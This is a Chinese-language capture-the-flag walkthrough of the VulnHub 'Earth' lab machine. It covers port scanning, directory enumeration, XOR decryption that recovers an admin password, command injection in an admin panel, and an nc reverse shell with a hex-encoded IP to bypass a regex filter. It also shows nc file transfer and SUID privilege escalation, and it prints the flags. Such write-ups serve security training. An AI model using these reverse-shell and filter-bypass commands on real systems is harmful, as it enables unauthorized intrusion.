vulnhub_Earth

前言

靶机地址->>>vulnhub_Earth
攻击机ip:192.168.20.121
靶机ip:192.168.20.122

参考文章
https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html
https://www.cnblogs.com/wthuskyblog/p/16032277.html
https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html

探测靶机

  1. 使用nmap扫描c段
    nmap 192.168.20.0/24
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap 192.168.20.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:37 CST
Nmap scan report for 192.168.20.1
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.20.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.20.2
Host is up (0.00074s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)

Nmap scan report for 192.168.20.122
Host is up (0.00041s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:29:AE:FF (VMware)

Nmap scan report for 192.168.20.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.20.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F4:37:D0 (VMware)

Nmap scan report for 192.168.20.121
Host is up (0.0000020s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 256 IP addresses (5 hosts up) scanned in 10.67 seconds

这里可以发现192.168.20.122为本次靶机开放了22,80端口以及443

  1. 使用-A参数查看完整靶机信息

nmap -A 192.168.20.122 -p 22,80,443

点击查看扫描结果

┌──(root㉿kali-purple)-[/home/kali]
└─# nmap -A 192.168.20.122 -p 22,80,443
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:44 CST
Nmap scan report for 192.168.20.122
Host is up (0.00047s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:29:AE:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 5.X|4.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (92%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 - 5.3 (98%), Linux 5.4 (98%), Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.13 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.20.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.67 seconds

这里可以发现80端口是400的一个状态然后443端口做了dns
DNS:terratest.earth.local

网站信息收集

  1. 更改hosts文件,目录为/etc/hosts

  1. 使用域名访问网站


发现了3个key

点击查看代码

    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

  1. 扫描网站目录

  2. 使用dirsearch扫描
    安装命令如下
    apt install dirsearch
    运行
    dirsearch -u terratest.earth.local/

点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirsearch -u terratest.earth.local/                                                   

  _|. _ _  _  _  _ _|_    v0.4.2                                                          
 (_||| _) (/_(_|| (_| )                                                                   
                                                                                          
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927                                                                                        

Output File: /root/.dirsearch/reports/terratest.earth.local-_23-04-16_12-46-03.txt

Error Log: /root/.dirsearch/logs/errors-23-04-16_12-46-03.log

Target: http://terratest.earth.local/

[12:46:03] Starting: 
[12:46:11] 301 -    0B  - /admin  ->  /admin/                               
[12:46:11] 200 -  306B  - /admin/                                           
[12:46:11] 200 -  306B  - /admin/?/login                                    
[12:46:11] 200 -  746B  - /admin/login                                      
[12:46:18] 403 -  199B  - /cgi-bin/                                         
                                                                             
Task Completed                                                                                                                                               
                  

发现了网站后台地址,/cgi-bin/我们是没权限访问的

  1. 查看网站后台

手工尝试爆破几次发现不是常见弱口令

  1. dirb目录扫描
点击查看扫描结果
                                                                                                                                                             
┌──(root㉿kali-purple)-[/home/kali/桌面]                                                                                                                     
└─# dirb https://terratest.earth.local/
                                                                                                                                                             
-----------------                                                                                                                                            
DIRB v2.22                                                                                                                                                   
By The Dark Raver                                                                                                                                            
-----------------

START_TIME: Sun Apr 16 13:11:00 2023
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                                                                                               
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)                                                                                              
                                                                                                                                                            
-----------------
END_TIME: Sun Apr 16 13:11:03 2023
DOWNLOADED: 4612 - FOUND: 3

查看robots.txt

这里可与i看到有一个不一样的文件 /testingnotes.* 但是不知道后缀 fuzz一下

  1. fuzz文件后缀

使用dirbuster的字典就可以了,路径如下
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt https://terratest.earth.local/testingnotes.FUZZ | grep "200"

这里可以看到结果为.txt,访问一下

测试安全消息传递系统注意事项:
*使用 XOR 加密作为算法,应该像在 RSA 中使用一样安全。
*地球已确认他们已收到我们发送的消息。
*测试数据.txt用于测试加密。
*Terra 用作管理门户的用户名。
待办事项:
*我们如何安全地将每月密钥发送到地球?还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。密钥应该有多长?
*需要改进消息传递界面和管理面板的界面,目前非常基础。

  1. 解密
    不是很懂加密所以这一部分参考大佬博客,附上博客连接
    Jing-X的博客
点击查看代码
import binascii
key1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
key2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
key3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

testdata = binascii.b2a_hex(decode_txt).decode()

print(hex(int(key1,16) ^ int(testdata,16)))
print(hex(int(key2,16) ^ int(testdata,16)))
print(hex(int(key3,16) ^ int(testdata,16)))

将解密出来的16进制转换一下

点击查看解密结果
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's hisCfy //}omo;/ppeare'2~d;f$'x,jj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/jkr0~h<Pj1s.=i뤽q,<j${ugn$u6&*+o'erlj|mnn/?;-'1%,f{kx8.`b)"⬮p`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-skl)$In*'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky8/k<6=+1䍑*Ir8xo"P|7wfbn66놖ƥF኶F嫧&2FFƤW7F7F娦Ƅプ"WfFV೒V'Ff닖B쵲Bä&Ɔ텖V'2v⢶F¦Rf'7B&Ɔ텖V'2낖'Fw27F璂ƖfRV&VB¦R暶äƄ&Vv¦ⓆfV7BV'Fw2FƷ7W&Rƅ7W&f6RÖFƥF⦆R&ᙷ&Ƨᣗg邧ƂFrƶ2WvV#Cf2FFSvb6V7△㚆㛶GG3痦6f'榢Cd禗㻇gFǃG੶6Bǃff6WFFVRǷG#࿳rFggභ–cGGcgVFearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

earthclimatechangebad4humans这一段字符串重复,实验密码

用户名,查看urlhttp://terratest.earth.local/admin/login
可以发现这是terra的测试,那么terra很有可能就是登录的用户名之一

账号:terra
密码:earthclimatechangebad4humans

漏洞发现及利用

发现漏洞

经过信息收集我们成功进入到了网站后台,在后台中有一个命令执行的输入框

可以发现权限很低

反弹shell

通过rce漏洞我们使用nc直接反弹shell到攻击机上

nc -nv 192.168.20.128 6666 -c bash

kali开启监听

后续更换了kali_linux IP为192.168.20.128

起初以为是有端口限制后面参考了网上的wp发现是服务器段采用了正则对IP进行数字匹配

find / -name "*.py" -type f | xargs grep "Remote connections are forbidden"

cat /var/earth_web/secure_message/forms.py

将ip地址转16进制即可反弹shell

点击即可跳转在线转换工具

nc -nv 0Xc0a81480 6666 -c bash

查找flag

find / -name "*flag*"

cat /var/earth_web/user_flag.txt


[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

SUID提权

find / -perm -u=s -type f 2>/dev/null

运行,发现报错

使用nc将文件传递回本地环境测试

点击查看代码
nc 192.168.20.128 1234 < /usr/bin/reset_root
nc -lnvp 1234 >reset_root

要chmod 777 reset_root给他权限
然后strace reset_root进行调试

运行之前安装strace
apt install strace
strace ./reset_root

可以发现是缺少了这三个文件

touch创建这三个文件,再运行reset_root,发现将root密码重置成了Earth:

点击查看命令
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

提权完毕查看root目录下的flag

[root_flag_b0da9554d29db2117b02aa8b66ec492e]

热门相关:仙城纪   霸皇纪   霸皇纪   刺客之王   霸皇纪